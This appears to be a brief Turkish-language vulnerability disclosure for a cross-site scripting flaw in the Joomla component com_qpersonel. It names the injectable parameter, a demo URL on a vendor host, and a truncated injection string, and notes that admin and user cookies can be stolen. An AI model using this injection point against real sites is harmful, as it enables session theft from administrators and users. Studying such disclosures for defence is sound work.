< ------------------- header data start ------------------- > ########################################################################### Joomla Component com_qpersonel Cross Site Scripting Vulnerabilities ########################################################################### # Author : Pyske # Greetz : Fl0riX , M-K-A , F0RTS3V3N , 3KB3R ,system-Hacker ,HeroTurK ,fireofdevil and ALL Cyber-Warrior # Name : com_qpersonel # Bug Type : Cross Site Scripting # Infection : Yönetici ve User cookiekleri calinabilir. # Bug Fix Advice : Zararlı karakterler filtrelenmelidir. # Demo Vuln. : http://demo.qproje.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE] ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > index.php?option=com_qpersonel&task=sirala&personel_sira="> < -- bug code end of -- > _________________________________________________________________ Windows Live: Arkadaşlarınız size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010